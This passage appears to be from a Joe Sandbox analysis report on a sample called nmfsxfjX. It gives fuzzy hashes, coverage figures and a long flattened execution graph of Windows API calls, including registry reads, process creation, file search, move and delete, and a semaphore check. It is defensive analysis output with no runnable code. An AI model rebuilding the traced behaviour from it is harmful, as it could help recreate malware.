                                                                                        • Associated: 00000006.00000001.2139650597.0000000000474000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000006.00000001.2139650597.0000000000478000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_6_1_400000_nmfsxfjX.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: ErrorLastRead
                                                                                        • String ID:
                                                                                        • API String ID: 4100373531-0
                                                                                        • Opcode ID: 46f42941f51e653cdae40cd00269a703bf4e12df5cc4a1911c605fdb7767d4e6
                                                                                        • Instruction ID: 277f4bdee2933866d2d1c697a3b04f0a6a13197b354a533a519a822f1f8833ca
                                                                                        • Opcode Fuzzy Hash: 46f42941f51e653cdae40cd00269a703bf4e12df5cc4a1911c605fdb7767d4e6
                                                                                        • Instruction Fuzzy Hash: 37419C75244305DFE7248F18DC84BA7B3E8FB48711F00082EEA8A87661F739E845CB99
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Execution Graph

                                                                                        Execution Coverage:7.9%
                                                                                        Dynamic/Decrypted Code Coverage:0%
                                                                                        Signature Coverage:0%
                                                                                        Total number of Nodes:1268
                                                                                        Total number of Limit Nodes:8
                                                                                        execution_graph 7219 404540 7220 40454a 7219->7220 7221 40455c 7219->7221 7220->7221 7223 409888 7220->7223 7224 409ee4 4 API calls 7223->7224 7225 409894 7224->7225 7225->7221 7230 408949 7231 4088d4 7230->7231 7237 408950 7230->7237 7232 4088e6 7231->7232 7233 40890a 7231->7233 7240 407bd0 7232->7240 7235 408903 7233->7235 7236 407bd0 9 API calls 7233->7236 7236->7235 7239 4089d0 7237->7239 7244 4071e8 7237->7244 7241 407be0 7240->7241 7242 40a724 9 API calls 7241->7242 7243 407c10 7241->7243 7242->7243 7243->7235 7247 407228 7244->7247 7248 4071f7 7247->7248 7249 40723d 7247->7249 7248->7237 7249->7248 7250 407262 GetStringTypeW 7249->7250 7250->7248 7251 40384c 7256 40212e 7251->7256 7258 402141 7256->7258 7272 406310 7258->7272 7259 4021aa 7279 40a9f0 7259->7279 7262 402db4 7263 402dcb 7262->7263 7265 402de8 7263->7265 7298 40a6c4 7263->7298 7266 402e27 7265->7266 7267 40a6c4 32 API calls 7265->7267 7268 402e43 7266->7268 7269 40a6c4 32 API calls 7266->7269 7267->7266 7304 402d2c 7268->7304 7269->7268 7273 405610 EnterCriticalSection 7272->7273 7276 406318 7273->7276 7274 406347 7275 405620 LeaveCriticalSection 7274->7275 7277 40634c 7275->7277 7276->7274 7278 404d14 32 API calls 7276->7278 7277->7259 7278->7276 7284 40b2b4 7279->7284 7285 40b2c2 7284->7285 7287 40b2c7 7284->7287 7286 40b6a8 9 API calls 7285->7286 7285->7287 7286->7287 7288 40a9f7 7287->7288 7289 40b318 7287->7289 7290 40b31a 7287->7290 7293 40a9dc 7288->7293 7292 40aa90 5 API calls 7289->7292 7291 40a9dc 32 API calls 7290->7291 7291->7288 7292->7288 7294 40a78c 32 API calls 7293->7294 7295 40a9e6 7294->7295 7296 40aa90 5 API calls 7295->7296 7297 4021cf 7296->7297 7297->7262 7299 40a6ef 7298->7299 7300 40a78c 32 API calls 7299->7300 7301 40a71a 7300->7301 7302 40a9f0 32 API calls 7301->7302 7303 40a720 7302->7303 7303->7265 7305 402d3a 7304->7305 7310 402d5b 7304->7310 7305->7310 7312 402cb7 7305->7312 7306 402da9 7307 402d89 7307->7306 7311 402cb7 32 API calls 7307->7311 7309 40a6c4 32 API calls 7309->7307 7310->7306 7310->7307 7310->7309 7311->7306 7313 402ccd 7312->7313 7315 40a6c4 32 API calls 7313->7315 7317 402ce5 7313->7317 7315->7317 7318 40276a 7317->7318 7319 40277e 7318->7319 7325 4027d1 7319->7325 7326 404164 7319->7326 7320 40a6c4 32 API calls 7323 40285b 7320->7323 7322 402871 7322->7310 7323->7322 7324 40a6c4 32 API calls 7323->7324 7324->7322 7325->7320 7325->7323 7327 404177 7326->7327 7328 40416f 7326->7328 7329 40418f 7327->7329 7330 40a6c4 32 API calls 7327->7330 7328->7325 7329->7325 7330->7329 7331 40a54c 7332 40a557 7331->7332 7333 40a55c 7331->7333 7338 4098bc 7333->7338 7344 40b8cc EnterCriticalSection 7338->7344 7340 4098c7 7341 4098cc 7340->7341 7345 40b8dc LeaveCriticalSection 7341->7345 7343 4098d7 7344->7340 7345->7343 7346 40ae50 7347 409ee4 4 API calls 7346->7347 7348 40ae5b 7347->7348 7352 40a950 GetModuleHandleA GetProcAddress 7353 40a976 7352->7353 7354 40a986 GetVersionExA 7353->7354 7355 40a97a 7353->7355 7354->7355 7356 40ad51 7357 40ad54 7356->7357 7360 40ad9d 7357->7360 7366 40a4c4 7357->7366 7361 409ff8 7 API calls 7360->7361 7365 40adc3 7360->7365 7363 40adb2 7361->7363 7362 40a87c 32 API calls 7362->7360 7364 40a87c 32 API calls 7363->7364 7363->7365 7364->7365 7367 40a4e0 7366->7367 7368 40a4d5 7366->7368 7370 40a4e4 7367->7370 7371 40a4ed 7367->7371 7369 409ee4 4 API calls 7368->7369 7379 40a4db 7369->7379 7373 409ff8 7 API calls 7370->7373 7383 40a388 7371->7383 7373->7379 7375 4098bc EnterCriticalSection 7376 40a504 7375->7376 7377 409ff8 7 API calls 7376->7377 7380 40a510 7377->7380 7378 4098cc LeaveCriticalSection 7378->7379 7379->7360 7379->7362 7381 409ee4 4 API calls 7380->7381 7382 40a53c 7380->7382 7381->7382 7382->7378 7384 4098bc EnterCriticalSection 7383->7384 7385 40a397 7384->7385 7386 40a3c2 7385->7386 7387 40a3cf 7385->7387 7388 4098cc LeaveCriticalSection 7386->7388 7389 40a4b7 7387->7389 7391 40a3ea 7387->7391 7392 40a3c7 7388->7392 7390 4098cc LeaveCriticalSection 7389->7390 7390->7392 7393 4098cc LeaveCriticalSection 7391->7393 7392->7375 7392->7379 7393->7392 7394 40b054 7395 40b6a8 9 API calls 7394->7395 7396 40b060 7395->7396 7397 40105a 7398 401063 7397->7398 7399 40109c 7397->7399 7400 401076 LocalAlloc 7398->7400 7405 401059 7398->7405 7402 401090 TlsSetValue 7400->7402 7403 401086 7400->7403 7402->7399 7404 401059 2 API calls 7403->7404 7404->7402 7408 40105a 7405->7408 7406 40109c 7406->7400 7407 401076 LocalAlloc 7409 401090 TlsSetValue 7407->7409 7410 401086 7407->7410 7408->7406 7408->7407 7409->7406 7410->7409 7415 408960 7416 4089b8 7415->7416 7417 4071e8 GetStringTypeW 7416->7417 7418 4089d0 7416->7418 7417->7416 7419 406760 GetLastError 7420 406714 9 API calls 7419->7420 7421 40677b 7420->7421 7425 40a86c 7426 40a78c 32 API calls 7425->7426 7427 40a878 7426->7427 7428 40966c GetACP 7431 40957c GetCPInfo 7428->7431 7432 409595 7431->7432 7434 40959f 7431->7434 7433 40a78c 32 API calls 7432->7433 7433->7434 7435 40256d 7436 402579 7435->7436 7437 402581 7436->7437 7438 409ee4 4 API calls 7436->7438 7439 402596 7438->7439 7440 409573 GetCPInfo 7441 409595 7440->7441 7443 40959f 7440->7443 7442 40a78c 32 API calls 7441->7442 7442->7443 7444 402378 7445 402381 InitializeCriticalSection 7444->7445 7446 402395 EnterCriticalSection 7444->7446 7445->7446 6638 401000 6639 40101f 6638->6639 6640 40102d GetModuleHandleA 6639->6640 6641 40b4c0 6640->6641 6642 40b514 GetEnvironmentStrings GetCommandLineA 6641->6642 6643 40b52d 6642->6643 6644 40b5fe 6643->6644 6645 40b59b GetModuleHandleA 6643->6645 6646 40aa78 5 API calls 6644->6646 6652 4018ae 6645->6652 6650 40b5fb 6646->6650 6653 4018d6 GetModuleFileNameA 6652->6653 6654 4018ca 6652->6654 6656 4018f6 6653->6656 6724 401612 RegOpenKeyA 6654->6724 6700 40128d 6656->6700 6658 401934 6659 40194d lstrlenA CharLowerBuffA 6658->6659 6664 401971 6659->6664 6660 40198f OpenSemaphoreA 6661 4019d1 6660->6661 6662 4019a6 CloseHandle 6660->6662 6719 40bdf4 GetLocalTime 6661->6719 6665 4019bf 6662->6665 6664->6660 6666 40128d 40 API calls 6665->6666 6667 4018cf 6666->6667 6682 401af8 6667->6682 6668 401a0a lstrcatA lstrcatA 6669 4019d8 6668->6669 6669->6668 6670 401a91 CreateProcessA 6669->6670 6671 401b00 CloseHandle CloseHandle 6670->6671 6672 401acd GetLastError 6670->6672 6674 401b16 OpenProcess 6671->6674 6721 4054ac 6672->6721 6676 401b43 GetExitCodeProcess 6674->6676 6677 401b2e GetLastError 6674->6677 6680 401b51 GetLastError 6676->6680 6681 401b66 CloseHandle 6676->6681 6679 401b3c ExitProcess 6677->6679 6696 401bb0 6677->6696 6678 40128d 40 API calls 6678->6682 6683 401b5f ExitProcess 6680->6683 6680->6696 6684 401b75 SleepEx 6681->6684 6681->6696 6697 40aa78 6682->6697 6685 40bdf4 GetLocalTime 6684->6685 6689 401b88 6685->6689 6686 401c63 6688 40128d 40 API calls 6686->6688 6687 40128d 40 API calls 6687->6689 6688->6667 6689->6674 6689->6687 6690 404bec 11 API calls 6690->6696 6691 401c3a SleepEx 6691->6669 6691->6696 6692 401c59 6693 40128d 40 API calls 6692->6693 6693->6686 6694 40128d 40 API calls 6694->6696 6695 401612 55 API calls 6695->6696 6696->6669 6696->6686 6696->6690 6696->6691 6696->6692 6696->6694 6696->6695 6698 40aa04 5 API calls 6697->6698 6699 40aa88 6698->6699 6699->6650 6701 4012a0 RegOpenKeyA 6700->6701 6702 4012fa 6700->6702 6703 4012c0 RegQueryValueA 6701->6703 6718 4013de 6701->6718 6706 4054ac WideCharToMultiByte 6702->6706 6704 4012f0 RegCloseKey 6703->6704 6705 4012e3 RegCloseKey 6703->6705 6704->6702 6705->6718 6707 40132b FindFirstFileA 6706->6707 6708 401364 6707->6708 6709 401346 FindClose 6707->6709 6711 404fc8 33 API calls 6708->6711 6754 404fc8 6709->6754 6712 40135d 6711->6712 6712->6718 6761 405168 6712->6761 6718->6658 6720 40be31 6719->6720 6720->6669 6722 4057b8 WideCharToMultiByte 6721->6722 6723 401ae9 6722->6723 6723->6678 6725 401643 6724->6725 6726 40164a RegQueryValueA 6724->6726 6725->6667 6727 40168b RegCloseKey GetLocalTime 6726->6727 6728 40166f 6726->6728 6730 4016e2 6727->6730 6729 40128d 40 API calls 6728->6729 6731 40167b RegCloseKey 6729->6731 6732 401706 CreateDirectoryA 6730->6732 6731->6725 6733 40171b 6732->6733 6734 40174c 6732->6734 6735 4054ac WideCharToMultiByte 6733->6735 6737 401766 FindFirstFileA 6734->6737 6736 401735 6735->6736 6738 40128d 40 API calls 6736->6738 6739 40181b 6737->6739 6745 401787 6737->6745 6738->6725 6740 40187f 6739->6740 6741 40181f 6739->6741 6742 4054ac WideCharToMultiByte 6740->6742 6743 4054ac WideCharToMultiByte 6741->6743 6752 40187a 6742->6752 6746 40183f 6743->6746 6744 401800 FindNextFileA 6744->6745 6747 401815 FindClose 6744->6747 6745->6744 6753 4017ea MoveFileA 6745->6753 7126 4013e4 6746->7126 6747->6739 6750 40128d 40 API calls 6750->6725 6751 4054ac WideCharToMultiByte 6751->6752 6752->6750 6753->6744 6795 405610 6754->6795 6756 404fec 6806 405620 6756->6806 6757 404fd1 6757->6756 6798 404ef4 6757->6798 6762 405630 32 API calls 6761->6762 6763 40517d 6762->6763 7005 404d14 6763->7005 6765 4056f8 4 API calls 6768 401388 GetLocalTime 6765->6768 6766 405184 6769 405189 6766->6769 7015 4068e0 6766->7015 6770 404ffc 6768->6770 6769->6765 6771 405630 32 API calls 6770->6771 6772 40500d 6771->6772 7088 4057b8 6772->7088 6774 40501e 6775 4056f8 4 API calls 6774->6775 6776 4013d5 6775->6776 6777 404c74 6776->6777 6778 404c81 6777->6778 6792 404c86 6777->6792 6779 405630 32 API calls 6778->6779 6778->6792 6780 404c94 6779->6780 6782 404d14 32 API calls 6780->6782 6783 404ca7 6780->6783 6790 404cc0 6780->6790 6782->6783 6785 409ee4 4 API calls 6783->6785 6786 404cac 6783->6786 6783->6790 6784 404ccb 6784->6786 6787 404ceb 6784->6787 6785->6790 6789 4056f8 4 API calls 6786->6789 7113 405378 6787->7113 6789->6792 7098 406838 6790->7098 6791 404cf5 7117 406b64 DeleteFileA 6791->7117 6792->6718 6809 40b8cc EnterCriticalSection 6795->6809 6797 40561b 6797->6757 6800 404f0f 6798->6800 6799 404f3f 6799->6756 6800->6799 6801 404f35 6800->6801 6810 406964 6800->6810 6801->6799 6831 405424 6801->6831 6805 404c74 33 API calls 6805->6799 7004 40b8dc LeaveCriticalSection 6806->7004 6808 404ff6 6808->6712 6809->6797 6841 406354 6810->6841 6812 406a1c GetFileAttributesA 6814 4069fb 6812->6814 6815 406a3e 6814->6815 6816 406a40 CreateFileA 6814->6816 6845 406714 6815->6845 6818 406ae4 GetLastError 6816->6818 6819 406b0f 6816->6819 6823 406af6 6818->6823 6844 4068c8 GetFileType 6819->6844 6821 406a62 6854 406388 6821->6854 6824 406714 9 API calls 6823->6824 6824->6821 6827 406b17 6827->6821 6828 406b48 6827->6828 6829 406714 9 API calls 6828->6829 6830 406b4f CloseHandle 6829->6830 6830->6821 6832 405438 6831->6832 6840 404f7b 6831->6840 6832->6840 6915 405630 6832->6915 6835 405461 6929 404bf4 6835->6929 6836 405168 32 API calls 6836->6835 6840->6799 6840->6805 6857 40b8cc EnterCriticalSection 6841->6857 6843 40635f 6843->6812 6843->6814 6844->6827 6846 40673e 6845->6846 6847 40671f 6845->6847 6846->6847 6848 406748 6846->6848 6858 406708 6847->6858 6849 406708 9 API calls 6848->6849 6851 406731 6849->6851 6861 40a724 6851->6861 6914 40b8dc LeaveCriticalSection 6854->6914 6856 406393 6856->6801 6857->6843 6864 40b6a8 TlsGetValue 6858->6864 6862 40b6a8 9 API calls 6861->6862 6863 406758 6862->6863 6863->6821 6865 40b6ba 6864->6865 6866 40670d 6864->6866 6869 40b6d4 6865->6869 6866->6851 6880 40b8cc EnterCriticalSection 6869->6880 6871 40b6e0 6875 40b6eb 6871->6875 6881 409ff8 6871->6881 6873 40b740 6913 40b8dc LeaveCriticalSection 6873->6913 6875->6873 6876 409ff8 7 API calls 6875->6876 6878 40b732 6876->6878 6877 40b6bf TlsSetValue 6877->6866 6878->6873 6905 409ee4 6878->6905 6880->6871 6882 40a00b 6881->6882 6892 40a004 6881->6892 6883 4098bc EnterCriticalSection 6882->6883 6885 40a010 6883->6885 6884 40a032 6887 40a055 6884->6887 6901 40a082 6884->6901 6885->6884 6886 409b08 7 API calls 6885->6886 6886->6884 6888 4098cc LeaveCriticalSection 6887->6888 6888->6892 6889 40a2d1 6891 409b08 7 API calls 6889->6891 6890 40a1fe 6893 40a248 6890->6893 6894 40a20c 6890->6894 6895 40a2da 6891->6895 6892->6875 6902 4098cc LeaveCriticalSection 6893->6902 6898 4098cc LeaveCriticalSection 6894->6898 6896 40a2ed 6895->6896 6897 40a2df 6895->6897 6900 4098cc LeaveCriticalSection 6896->6900 6899 4098cc LeaveCriticalSection 6897->6899 6898->6892 6903 40a2e4 6899->6903 6900->6892 6901->6889 6901->6890 6902->6892 6904 409ff8 7 API calls 6903->6904 6904->6892 6906 409ff2 6905->6906 6907 409ef3 6905->6907 6906->6873 6908 4098bc EnterCriticalSection 6907->6908 6911 409ef8 6908->6911 6909 409fec 6910 4098cc LeaveCriticalSection 6909->6910 6910->6906 6911->6909 6912 409de0 VirtualFree VirtualFree EnterCriticalSection LeaveCriticalSection 6911->6912 6912->6909 6913->6877 6914->6856 6916 405651 6915->6916 6917 4056c0 6916->6917 6918 405610 EnterCriticalSection 6916->6918 6940 40b8cc EnterCriticalSection 6917->6940 6919 40565c 6918->6919 6923 409ff8 7 API calls 6919->6923 6927 405688 6919->6927 6921 405450 6921->6835 6921->6836 6922 4056b8 6925 405620 LeaveCriticalSection 6922->6925 6926 405674 6923->6926 6925->6917 6926->6927 6941 40b8ec 6926->6941 6927->6922 6945 40b868 EnterCriticalSection 6927->6945 6930 404c09 6929->6930 6933 404c12 6929->6933 6931 409ee4 4 API calls 6930->6931 6931->6933 6932 404c44 6935 4056f8 6932->6935 6933->6932 6934 409ff8 7 API calls 6933->6934 6934->6932 6999 40b8dc LeaveCriticalSection 6935->6999 6937 40571b 6938 40572a 6937->6938 7000 4056d4 6937->7000 6938->6840 6940->6921 6942 40b913 6941->6942 6950 40a87c 6942->6950 6946 40b881 6945->6946 6947 40b88b InitializeCriticalSection LeaveCriticalSection 6945->6947 6948 40b8ec 29 API calls 6946->6948 6947->6922 6949 40b88a 6948->6949 6949->6947 6955 40a78c 6950->6955 6952 40a888 6966 40aa90 6952->6966 6956 40a7a4 6955->6956 6961 40a844 6955->6961 6957 40a7ad GetModuleFileNameA 6956->6957 6958 40a7fe GetStdHandle WriteFile 6956->6958 6963 40a7c5 6957->6963 6973 401ebc 6958->6973 6965 40a7ed 6961->6965 6975 40a8f4 6961->6975 6969 40a744 GetVersion 6963->6969 6965->6952 6986 40aa04 6966->6986 6970 40a765 GetCurrentThreadId 6969->6970 6971 40a75e 6969->6971 6972 40a778 6970->6972 6971->6965 6972->6965 6974 401ec4 WriteFile WriteFile 6973->6974 6974->6965 6976 406964 14 API calls 6975->6976 6977 40a910 6976->6977 6978 40a949 6977->6978 6979 40a894 WideCharToMultiByte GetLocalTime GetLocalTime 6977->6979 6978->6965 6980 40a91d 6979->6980 6981 406204 32 API calls 6980->6981 6982 40a92e 6981->6982 6983 406204 32 API calls 6982->6983 6984 40a940 6983->6984 6985 406838 32 API calls 6984->6985 6985->6978 6987 40b48c EnterCriticalSection 6986->6987 6992 40aa10 6987->6992 6988 40aa6c 6989 40b49c LeaveCriticalSection 6988->6989 6990 40a890 6989->6990 6990->6927 6991 40b49c LeaveCriticalSection 6993 40aa59 6991->6993 6992->6988 6992->6991 6994 406364 VirtualFree VirtualFree EnterCriticalSection LeaveCriticalSection 6993->6994 6995 40aa5e 6994->6995 6996 4056d4 VirtualFree VirtualFree EnterCriticalSection LeaveCriticalSection 6995->6996 6997 40aa63 6996->6997 6998 40b350 ExitProcess 6997->6998 6998->6988 6999->6937 7001 4056e3 7000->7001 7002 4056dd 7000->7002 7001->6938 7003 409ee4 4 API calls 7002->7003 7003->7001 7004->6808 7006 404d20 7005->7006 7007 404d29 7005->7007 7044 404da4 7006->7044 7009 405630 32 API calls 7007->7009 7014 404d25 7007->7014 7010 404d39 7009->7010 7011 404d40 7010->7011 7029 406204 7010->7029 7013 4056f8 4 API calls 7011->7013 7013->7014 7014->6766 7016 4068f1 7015->7016 7017 4068fb 7015->7017 7018 406714 9 API calls 7016->7018 7019 40690a 7017->7019 7021 406908 7017->7021 7028 4068f8 7018->7028 7020 406398 31 API calls 7019->7020 7022 40692c SetFilePointer 7020->7022 7023 406714 9 API calls 7021->7023 7024 406951 7022->7024 7025 406956 7022->7025 7023->7028 7026 406780 10 API calls 7024->7026 7027 40642c 4 API calls 7025->7027 7026->7025 7027->7028 7028->6769 7030 406228 7029->7030 7031 40621b 7029->7031 7033 406222 7030->7033 7051 406398 7030->7051 7032 406714 9 API calls 7031->7032 7032->7033 7033->7011 7036 40625c 7038 40626c 7036->7038 7041 406284 7036->7041 7037 4068e0 32 API calls 7037->7036 7039 406794 11 API calls 7038->7039 7043 40627d 7039->7043 7041->7043 7065 406794 7041->7065 7074 40642c 7043->7074 7045 405610 EnterCriticalSection 7044->7045 7046 404dad 7045->7046 7047 404dfc 7046->7047 7050 406204 32 API calls 7046->7050 7048 405620 LeaveCriticalSection 7047->7048 7049 404e01 7048->7049 7049->7014 7050->7046 7052 4063a9 7051->7052 7053 406418 7052->7053 7054 406354 EnterCriticalSection 7052->7054 7079 40b8cc EnterCriticalSection 7053->7079 7056 4063b4 7054->7056 7058 409ff8 7 API calls 7056->7058 7064 4063e0 7056->7064 7057 406241 7057->7036 7057->7037 7060 4063cc 7058->7060 7059 406410 7062 406388 LeaveCriticalSection 7059->7062 7063 40b8ec 32 API calls 7060->7063 7060->7064 7061 40b868 32 API calls 7061->7059 7062->7053 7063->7064 7064->7059 7064->7061 7066 4067a3 7065->7066 7067 4067ae WriteFile 7065->7067 7068 406714 9 API calls 7066->7068 7069 4067d4 7067->7069 7070 4067cc 7067->7070 7071 4067aa 7068->7071 7069->7041 7080 406780 GetLastError 7070->7080 7071->7041 7083 40b8dc LeaveCriticalSection 7074->7083 7076 406440 7077 40644f 7076->7077 7084 406364 7076->7084 7077->7033 7079->7057 7081 406714 9 API calls 7080->7081 7082 406790 7081->7082 7082->7041 7083->7076 7085 40636d 7084->7085 7087 406373 7084->7087 7086 409ee4 4 API calls 7085->7086 7086->7087 7087->7077 7090 4057ed 7088->7090 7089 40609b 7089->6774 7090->7089 7092 4073c8 7090->7092 7093 4073d3 7092->7093 7094 4073d8 7092->7094 7093->7090 7095 4073ff WideCharToMultiByte 7094->7095 7096 4073e4 7094->7096 7097 40742a 7095->7097 7096->7090 7097->7090 7099 406852 7098->7099 7100 406847 7098->7100 7102 406398 31 API calls 7099->7102 7101 406714 9 API calls 7100->7101 7104 40684e 7101->7104 7103 406858 CloseHandle 7102->7103 7105 406889 7103->7105 7106 406869 7103->7106 7104->6784 7108 40642c 4 API calls 7105->7108 7107 40642c 4 API calls 7106->7107 7109 406883 7107->7109 7110 40688f 7108->7110 7109->6784 7111 406780 10 API calls 7110->7111 7112 406895 7111->7112 7112->6784 7114 405387 7113->7114 7116 405390 7113->7116 7121 40be40 7114->7121 7116->6791 7118 404cfe 7117->7118 7119 406b77 7117->7119 7118->6786 7120 406780 10 API calls 7119->7120 7120->7118 7122 40b6a8 9 API calls 7121->7122 7123 40be4a 7122->7123 7124 409ff8 7 API calls 7123->7124 7125 40be50 7123->7125 7124->7125 7125->7116 7182 401ff4 7126->7182 7128 401411 RegOpenKeyA 7129 401475 7128->7129 7130 40142d RegQueryValueA 7128->7130 7133 404fc8 33 API calls 7129->7133 7131 401452 7130->7131 7132 40146d RegCloseKey 7130->7132 7131->7132 7132->7129 7134 401484 7133->7134 7135 4014a1 7134->7135 7136 40148d 7134->7136 7138 404ffc 32 API calls 7135->7138 7137 40128d 40 API calls 7136->7137 7139 401499 7137->7139 7140 4014b5 7138->7140 7139->6751 7141 404ffc 32 API calls 7140->7141 7142 4014c5 7141->7142 7143 404ffc 32 API calls 7142->7143 7144 4014d5 7143->7144 7145 404ffc 32 API calls 7144->7145 7146 4014ec 7145->7146 7184 40117d GetLocalTime 7146->7184 7148 4014fb 7149 404ffc 32 API calls 7148->7149 7150 40150a 7149->7150 7151 404ffc 32 API calls 7150->7151 7152 40151a 7151->7152 7153 404ffc 32 API calls 7152->7153 7154 40152a 7153->7154 7155 404ffc 32 API calls 7154->7155 7156 40153a 7155->7156 7157 404ffc 32 API calls 7156->7157 7158 40154a 7157->7158 7159 404ffc 32 API calls 7158->7159 7160 40155a 7159->7160 7161 404ffc 32 API calls 7160->7161 7162 40156a 7161->7162 7163 404ffc 32 API calls 7162->7163 7164 40157a 7163->7164 7165 404ffc 32 API calls 7164->7165 7166 40158a 7165->7166 7167 404ffc 32 API calls 7166->7167 7168 40159d 7167->7168 7169 404ffc 32 API calls 7168->7169 7170 4015ad 7169->7170 7171 404ffc 32 API calls 7170->7171 7172 4015bd 7171->7172 7173 404ffc 32 API calls 7172->7173 7174 4015cd 7173->7174 7175 404ffc 32 API calls 7174->7175 7176 4015dd 7175->7176 7177 404ffc 32 API calls 7176->7177 7178 4015ed 7177->7178 7179 404ffc 32 API calls 7178->7179 7180 4015fd 7179->7180 7181 404c74 33 API calls 7180->7181 7181->7139 7183 402006 7182->7183 7183->7128 7185 401199 7184->7185 7186 4054ac WideCharToMultiByte 7185->7186 7187 4011ec 7186->7187 7190 401108 GetTimeZoneInformation 7187->7190 7189 4011f8 7189->7148 7191 40112d 7190->7191 7191->7189 7450 40b000 7459 40aeb4 7450->7459 7453 40b015 7456 40b868 32 API calls 7453->7456 7454 40b009 7455 40a87c 32 API calls 7454->7455 7457 40b013 7455->7457 7458 40b02e 7456->7458 7460 40aec2 7459->7460 7461 40af0e 7459->7461 7462 40aecb GetEnvironmentStrings 7460->7462 7466 40aee3 7460->7466 7470 40af1b 7461->7470 7471 40985c 7461->7471 7463 40aed9 7462->7463 7462->7466 7464 40a87c 32 API calls 7463->7464 7464->7466 7467 409ff8 7 API calls 7466->7467 7467->7461 7468 40af67 7469 409ee4 4 API calls 7468->7469 7468->7470 7469->7470 7470->7453 7470->7454 7472 409ff8 7 API calls 7471->7472 7473 40986e 7472->7473 7473->7468 7474 40b200 7475 40b212 SetConsoleCtrlHandler 7474->7475 7476 40b22f 7474->7476 7475->7476 7477 40b24b 7476->7477 7478 40b23b 7476->7478 7480 40b240 7477->7480 7481 40b6a8 9 API calls 7477->7481 7479 40a724 9 API calls 7478->7479 7479->7480 7482 40b261 7481->7482 7482->7480 7483 409ff8 7 API calls 7482->7483 7484 40b27a 7483->7484 7484->7480 7485 40a724 9 API calls 7484->7485 7485->7480 7486 404500 7489 402bf5 7486->7489 7492 40293c 7489->7492 7491 402c20 7493 40294f 7492->7493 7503 402523 7493->7503 7495 4029b4 7496 402acd 7495->7496 7502 404164 32 API calls 7495->7502 7499 40a6c4 32 API calls 7496->7499 7500 402b6f 7496->7500 7501 402b95 7496->7501 7498 402bbe RaiseException 7498->7491 7499->7500 7508 40265c 7500->7508 7501->7498 7502->7496 7504 409ff8 7 API calls 7503->7504 7505 402530 7504->7505 7506 40a9f0 32 API calls 7505->7506 7507 402550 7505->7507 7506->7507 7507->7495 7509 402670 7508->7509 7510 402689 7508->7510 7509->7510 7512 40a6c4 32 API calls 7509->7512 7511 4026a5 7510->7511 7513 40a6c4 32 API calls 7510->7513 7514 4026ad 7511->7514 7516 402711 7511->7516 7512->7510 7513->7511 7515 4026c0 7514->7515 7518 40a6c4 32 API calls 7514->7518 7515->7501 7516->7515 7517 40a6c4 32 API calls 7516->7517 7517->7515 7518->7515 7519 402100 7520 40a9f0 32 API calls 7519->7520 7521 402105 7520->7521 7526 40ae04 7529 40ad54 7526->7529 7530 40ad6a 7529->7530 7532 40ad9d 7529->7532 7531 40a4c4 7 API calls 7530->7531 7533 40ad87 7531->7533 7534 409ff8 7 API calls 7532->7534 7536 40adc3 7532->7536 7533->7532 7535 40a87c 32 API calls 7533->7535 7537 40adb2 7534->7537 7535->7532 7537->7536 7538 40a87c 32 API calls 7537->7538 7538->7536 7539 402d0c 7540 40212e 32 API calls 7539->7540 7541 402d11 7540->7541 7542 402d1c 7541->7542 7543 402db4 32 API calls 7541->7543 7543->7542 7544 40480e 7548 404779 7544->7548 7545 40481b 7547 404659 32 API calls 7547->7548 7548->7545 7548->7547 7549 40a6c4 32 API calls 7548->7549 7550 40419b 7548->7550 7549->7548 7551 4041ab 7550->7551 7554 4041bf 7550->7554 7552 40a6c4 32 API calls 7551->7552 7552->7554 7553 40a6c4 32 API calls 7555 4041da 7553->7555 7554->7553 7554->7555 7556 404231 7555->7556 7557 40a6c4 32 API calls 7555->7557 7558 4041e1 7555->7558 7556->7558 7559 40a6c4 32 API calls 7556->7559 7557->7556 7558->7548 7559->7558 7563 40a310 7564 40a376 7563->7564 7566 40a31e 7563->7566 7566->7564 7568 40a634 VirtualFree 7566->7568 7570 40a658 VirtualFree 7566->7570 7569 40a64c 7568->7569 7569->7566 7571 40a66e 7570->7571 7571->7566 7212 40ae18 7213 409ff8 7 API calls 7212->7213 7214 40ae23 7213->7214 7215 40ae30 7214->7215 7216 40ae3b GetModuleFileNameA 7214->7216 7217 40a87c 32 API calls 7215->7217 7218 40ae3a 7217->7218 7218->7216 7572 406118 7573 405610 EnterCriticalSection 7572->7573 7574 40611f 7573->7574 7575 406141 7574->7575 7578 404d14 32 API calls 7574->7578 7576 405620 LeaveCriticalSection 7575->7576 7577 406146 7576->7577 7578->7574 7579 407124 7580 407228 GetStringTypeW 7579->7580 7581 407136 7580->7581 7582 402c25 7583 402c34 7582->7583 7584 40212e 32 API calls 7583->7584 7585 402c43 7583->7585 7584->7585 7586 40293c 33 API calls 7585->7586 7587 402c71 7586->7587 7588 40b628 GetVersionExA 7589 40b64a 7588->7589 7590 40b64f TlsAlloc VirtualQuery TlsSetValue TlsAlloc 7588->7590 7589->7590 7591 40b928 InitializeCriticalSection 7592 405030 7593 40507c 7592->7593 7600 405046 7592->7600 7595 4050ca 7593->7595 7597 405087 7593->7597 7596 4050dc 7595->7596 7601 404d14 32 API calls 7595->7601 7598 406204 32 API calls 7596->7598 7599 40505f 7596->7599 7597->7599 7602 404d14 32 API calls 7597->7602 7598->7599 7600->7599 7603 405268 7600->7603 7601->7596 7602->7599 7604 4052c7 7603->7604 7607 405286 7603->7607 7605 405348 7604->7605 7606 4052ec 7604->7606 7609 4052b1 7604->7609 7608 406204 32 API calls 7605->7608 7610 404d14 32 API calls 7606->7610 7612 4052f8 7606->7612 7607->7609 7611 404d14 32 API calls 7607->7611 7608->7609 7609->7600 7610->7612 7611->7609 7612->7609 7613 404d14 32 API calls 7612->7613 7613->7609 7614 40ab30 7615 40ab4a 7614->7615 7623 40ac9a 7614->7623 7616 40ad54 32 API calls 7615->7616 7617 40ab6f 7616->7617 7618 409ff8 7 API calls 7617->7618 7619 40abc8 7618->7619 7621 40a87c 32 API calls 7619->7621 7625 40abe2 7619->7625 7620 40ac91 7622 40ad54 32 API calls 7620->7622 7621->7625 7622->7623 7624 40ad54 32 API calls 7624->7625 7625->7620 7625->7624 7626 403834 7627 40212e 32 API calls 7626->7627 7628 403839 7627->7628 7629 402db4 32 API calls 7628->7629 7630 403844 7629->7630 7631 403334 7632 40333b 7631->7632 7636 40338b 7631->7636 7633 403381 7632->7633 7646 4033f1 7632->7646 